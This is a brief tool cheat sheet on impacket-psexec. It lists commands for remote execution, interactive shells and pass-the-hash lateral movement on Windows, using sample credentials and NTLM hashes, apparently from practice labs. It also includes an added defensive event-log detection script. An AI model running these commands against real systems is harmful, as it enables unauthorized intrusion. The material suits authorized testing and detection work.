Tools | February 9, 2026 | 1 min read | by 0xt0pus

impacket-psexec

Remote command execution tool using SMB/RPC for lateral movement in Windows environments


Impacket-psexec

Description

Impacket-psexec is used for remote command execution on Windows machines via SMB. It creates a service on the target to execute commands and can be used with plaintext passwords or NTLM hashes.
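For defenders, the service creation described above shows up on the target host. The following added example (not part of the original page or of Impacket) pairs a Windows service-install event (System log, event ID 7045) with an NTLM network logon (Security log, event ID 4624, logon type 3) on the same host shortly before it. The record layout, host names, addresses and the 30-second window are assumptions made for the example.

```python
from datetime import datetime, timedelta

# Constructed sample records: simplified fields from Security 4624 (logon)
# and System 7045 (service installed) events. Hosts, names and IPs are made up.
EVENTS = [
    {"host": "WS01", "time": "2026-02-09T10:00:01", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "administrator",
     "IpAddress": "192.0.2.10"},
    {"host": "WS01", "time": "2026-02-09T10:00:03", "id": 7045,
     "ServiceName": "kQzT", "ImagePath": r"%systemroot%\hBxWqLzA.exe"},
    # Kerberos logon, then a service install: outside this NTLM-only rule.
    {"host": "WS02", "time": "2026-02-09T11:00:00", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "backup",
     "IpAddress": "192.0.2.20"},
    {"host": "WS02", "time": "2026-02-09T11:00:05", "id": 7045,
     "ServiceName": "VendorUpdater", "ImagePath": r"C:\Program Files\Vendor\upd.exe"},
    # NTLM network logon, but the service appears two hours later.
    {"host": "WS03", "time": "2026-02-09T12:00:00", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "helpdesk",
     "IpAddress": "192.0.2.30"},
    {"host": "WS03", "time": "2026-02-09T14:00:00", "id": 7045,
     "ServiceName": "PrintHelper", "ImagePath": r"C:\Windows\System32\ph.exe"},
]

def find_remote_service_installs(events, window=timedelta(seconds=30)):
    """Pair each 7045 with NTLM type-3 logons to the same host in the prior `window`."""
    logons = {}  # host -> [(timestamp, logon event)]
    hits = []
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        ts = datetime.fromisoformat(ev["time"])
        if (ev["id"] == 4624 and ev.get("LogonType") == 3
                and ev.get("AuthenticationPackageName") == "NTLM"):
            logons.setdefault(ev["host"], []).append((ts, ev))
        elif ev["id"] == 7045:
            # Events are processed in time order, so stored logons are never later.
            for logon_ts, logon in logons.get(ev["host"], []):
                if ts - logon_ts <= window:
                    hits.append((logon, ev))
    return hits

if __name__ == "__main__":
    for logon, svc in find_remote_service_installs(EVENTS):
        print(f'{svc["host"]}: service {svc["ServiceName"]} ({svc["ImagePath"]}) '
              f'installed after NTLM network logon by {logon["TargetUserName"]} '
              f'from {logon["IpAddress"]}')
```

Only the WS01 pair is reported; widening the window trades fewer misses for more noise from legitimate remote administration.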

Usage 1: Execute Command with Domain Credentials

Command:

impacket-psexec DOMAIN/username:Password@TARGET "cmd.exe /c whoami & ipconfig /all"

Usage 2: Execute Command with Local Credentials

Command:

impacket-psexec username:Password@TARGET "cmd.exe /c whoami"

Usage 3: Get Interactive Shell

Command:

impacket-psexec username:Password@TARGET

Usage 4: Pass the Hash

Use an NTLM hash instead of a password for authentication.

Command:

impacket-psexec administrator@egotistical-bank.local -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

Usage 5: Using psexec.py (Python script variant)

Command:

python3 psexec.py administrator:'4dD!5}x/re8]FBuZ'@10.10.10.149

Usage 6: Domain Authentication

Command:

impacket-psexec 'corp/jen:Nexus123!@192.168.145.72'